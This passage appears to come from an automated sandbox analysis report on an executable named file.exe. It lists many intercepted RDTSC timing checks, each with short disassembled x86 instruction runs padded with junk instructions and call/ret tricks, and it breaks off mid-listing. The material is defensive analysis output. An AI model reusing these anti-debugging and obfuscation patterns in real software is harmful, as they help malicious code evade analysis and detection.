Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC4D3 second address: 5EC57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 1EC2350Ah 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FCBA46BC738h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 cld 0x0000002a lea ebx, dword ptr [ebp+1244C2DBh] 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007FCBA46BC738h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D1A4Bh], edi 0x00000050 or dword ptr [ebp+122D1A4Bh], esi 0x00000056 mov ecx, dword ptr [ebp+122D3906h] 0x0000005c xchg eax, ebx 0x0000005d pushad 0x0000005e jmp 00007FCBA46BC745h 0x00000063 jbe 00007FCBA46BC74Ch 0x00000069 jmp 00007FCBA46BC746h 0x0000006e popad 0x0000006f push eax 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jg 00007FCBA46BC736h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC5D7 second address: 5EC5DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC5DC second address: 5EC619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jnc 00007FCBA46BC739h 0x00000010 push 00000000h 0x00000012 jbe 00007FCBA46BC737h 0x00000018 call 00007FCBA46BC739h 0x0000001d jmp 00007FCBA46BC742h 0x00000022 push eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC619 second address: 5EC61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC61D second address: 5EC680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC745h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jo 00007FCBA46BC74Bh 0x00000015 jmp 00007FCBA46BC745h 0x0000001a push edi 0x0000001b js 00007FCBA46BC736h 0x00000021 pop edi 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 jo 00007FCBA46BC73Eh 0x0000002b jne 00007FCBA46BC738h 0x00000031 pushad 0x00000032 popad 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c jg 00007FCBA46BC736h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC7BA second address: 5EC806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FCBA4817E85h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007FCBA4817E7Ah 0x00000016 jno 00007FCBA4817E7Ch 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 jnp 00007FCBA4817E80h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5EC806 second address: 5EC827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FCBA46BC738h 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60CB13 second address: 60CB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E85h 0x00000009 pop ebx 0x0000000a ja 00007FCBA4817E7Ch 0x00000010 jl 00007FCBA4817E78h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60CB44 second address: 60CB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60CB4A second address: 60CB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 jbe 00007FCBA4817E8Dh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AB0C second address: 60AB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC744h 0x00000009 jo 00007FCBA46BC736h 0x0000000f popad 0x00000010 jns 00007FCBA46BC73Ah 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AC96 second address: 60ACA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FCBA4817E76h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60ACA3 second address: 60ACA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60ACA8 second address: 60ACAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AE01 second address: 60AE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AE09 second address: 60AE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AE0F second address: 60AE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCBA46BC749h 0x0000000b ja 00007FCBA46BC736h 0x00000011 jmp 00007FCBA46BC741h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007FCBA46BC736h 0x0000001f jmp 00007FCBA46BC73Bh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AE59 second address: 60AE80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c jp 00007FCBA4817E76h 0x00000012 pop edi 0x00000013 push ecx 0x00000014 jns 00007FCBA4817E76h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60AFD7 second address: 60AFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60B142 second address: 60B15E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60BBF7 second address: 60BBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 602FBD second address: 602FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FCBA4817E82h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 602FD5 second address: 602FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5E20A5 second address: 5E20E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c jmp 00007FCBA4817E83h 0x00000011 popad 0x00000012 push edx 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FCBA4817E85h 0x0000001b pop edx 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60C444 second address: 60C448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60F216 second address: 60F21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 60F21A second address: 60F220 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612794 second address: 612798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612C7F second address: 612C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612DA9 second address: 612DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6115A8 second address: 6115AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6115AE second address: 6115B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612E98 second address: 612EBA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCBA46BC738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCBA46BC73Fh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 612EBA second address: 612EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B50 second address: 616B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B58 second address: 616B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B5E second address: 616B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC746h 0x00000009 jo 00007FCBA46BC736h 0x0000000f popad 0x00000010 pop edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616B85 second address: 616B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616CE5 second address: 616CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616E3B second address: 616E68 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCBA4817E89h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jns 00007FCBA4817E76h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616E68 second address: 616E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 616FDD second address: 616FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6175A1 second address: 6175AB instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA46BC736h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 618D08 second address: 618D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FCBA4817E76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 618D13 second address: 618D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b js 00007FCBA46BC744h 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FCBA46BC736h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 618D2C second address: 618D42 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 or di, B341h 0x0000000c push 94D92880h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619937 second address: 619976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a mov esi, dword ptr [ebp+122D1C78h] 0x00000010 nop 0x00000011 jmp 00007FCBA46BC740h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FCBA46BC741h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619976 second address: 619988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619988 second address: 61998E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619B64 second address: 619B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 619DA8 second address: 619DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B322 second address: 61B326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61B969 second address: 61B97B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA46BC73Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C35B second address: 61C3B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FCBA4817E88h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FCBA4817E78h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov esi, dword ptr [ebp+122D3922h] 0x00000032 push 00000000h 0x00000034 mov esi, 48731DDCh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C1FC second address: 61C202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C3B5 second address: 61C3D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C202 second address: 61C206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61C3D2 second address: 61C3D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61E450 second address: 61E455 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61CBE4 second address: 61CBE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61CBE8 second address: 61CBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D4A4D second address: 5D4A53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61EADB second address: 61EAE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61EAE1 second address: 61EAF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA4817E84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61F588 second address: 61F5FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, bx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FCBA46BC738h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jmp 00007FCBA46BC745h 0x00000030 or dword ptr [ebp+122D2773h], esi 0x00000036 push 00000000h 0x00000038 jmp 00007FCBA46BC749h 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push ecx 0x00000041 pushad 0x00000042 popad 0x00000043 pop ecx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 61F5FE second address: 61F617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FCBA4817E7Eh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621480 second address: 621510 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007FCBA46BC740h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FCBA46BC738h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov esi, ebx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FCBA46BC738h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D27EBh], ecx 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D2BA9h], esi 0x00000058 xchg eax, ebx 0x00000059 jmp 00007FCBA46BC744h 0x0000005e push eax 0x0000005f js 00007FCBA46BC74Fh 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 pop eax 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 620712 second address: 620716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 621D93 second address: 621D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62730A second address: 627310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627310 second address: 627380 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC73Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FCBA46BC738h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007FCBA46BC738h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov ebx, 04D39903h 0x00000048 cmc 0x00000049 jne 00007FCBA46BC738h 0x0000004f push 00000000h 0x00000051 mov dword ptr [ebp+1244DF87h], ebx 0x00000057 xchg eax, esi 0x00000058 push edi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 626364 second address: 626369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 627380 second address: 62739F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBA46BC745h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 626369 second address: 626389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b jp 00007FCBA4817E7Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 628442 second address: 628447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 628447 second address: 62845A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBA4817E78h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62845A second address: 62845E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62845E second address: 628468 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A59E second address: 62A5AB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A734 second address: 62A7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 nop 0x00000008 mov di, EC62h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov edi, ecx 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FCBA4817E78h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 and ebx, 3BDCC548h 0x0000003c xor edi, dword ptr [ebp+122D1825h] 0x00000042 mov eax, dword ptr [ebp+122D02B9h] 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007FCBA4817E78h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 00000016h 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 sub bh, FFFFFFA7h 0x00000065 